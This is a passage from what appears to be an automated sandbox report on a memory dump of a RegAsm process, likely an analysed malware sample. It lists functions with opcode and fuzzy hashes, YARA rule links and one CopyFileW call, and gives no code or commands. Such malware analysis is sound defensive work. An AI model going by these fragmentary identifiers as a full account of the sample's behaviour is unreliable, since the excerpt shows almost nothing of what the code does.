                                        Function 004345F0 Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                        • Instruction ID: fc3937f92bddd9b9036211213233e27d23e83f380f16c5f831fb688d5273015d
                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                        • Instruction Fuzzy Hash: 8E11EC336051D40EC3158D3C84005A5BF930AD7234F59939AF4B4972E6D62A9D8B8359
                                        Function 0042A060 Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                        • Instruction ID: 81ebb7552e56e7d5adf40a514b1d7c04d719dbb311c9cbdb1d4034df3b6f2776
                                        • Opcode Fuzzy Hash: a62376ffa6d90c1baa96e3dbf302ab3dfe7742f197fede568b4cb05d9ce342f2
                                        • Instruction Fuzzy Hash: D601D4F5B00B1147D7309E11A5C0B27B2A9AF8070CF59443EED4467342DB7EEC28C69A
                                        Function 00402B70 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                        • Instruction ID: dad6f7438d27f99e102fe50886f5565f1d4720bfb2582f27d129ae765fd9d515
                                        • Opcode Fuzzy Hash: dabecf6e6ddfb1cdd8269c5c9ebdc2cc04a1f760bd0808b9cf36547e64e5e14a
                                        • Instruction Fuzzy Hash: EEF0E937B1551607A214DD26ACC453BB366D7C6314B295439E841E3281C979F80692B8
                                        Function 0042B475 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                        • Instruction ID: c74ae76d4aeefb6f888da0d67bba939e79ddb671e6929748130615be24dd088f
                                        • Opcode Fuzzy Hash: 676c11319c11e30e550c5dd480f93aa2d5812f95884204bdcd3370e1ab4f8030
                                        • Instruction Fuzzy Hash: E6D022789048005BC608EB10EE12639B2688F4B2AEF00303DE443FF353CE38EC60890E
                                        Function 0040C274 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                        • Instruction ID: 52fe0259059b82c7cb9fb3d0f913ef24527c2e8030ec2916e1bb67edfa7a0227
                                        • Opcode Fuzzy Hash: 32957ae45f5fb5a31ef22e0da77331464b0a71ff3474b199ef627a84159dc668
                                        • Instruction Fuzzy Hash: 01D0122494A2994AD3068F389CA1731BBB1EF03100F442558D142DB291C7D09016865C
                                        Function 00427546 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2179172617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                        Similarity
                                        • API ID: CopyFile
                                        • String ID: <vB$B\$JC$OR
                                        • API String ID: 1304948518-1094185596
                                        • Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                        • Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
                                        • Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                        • Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A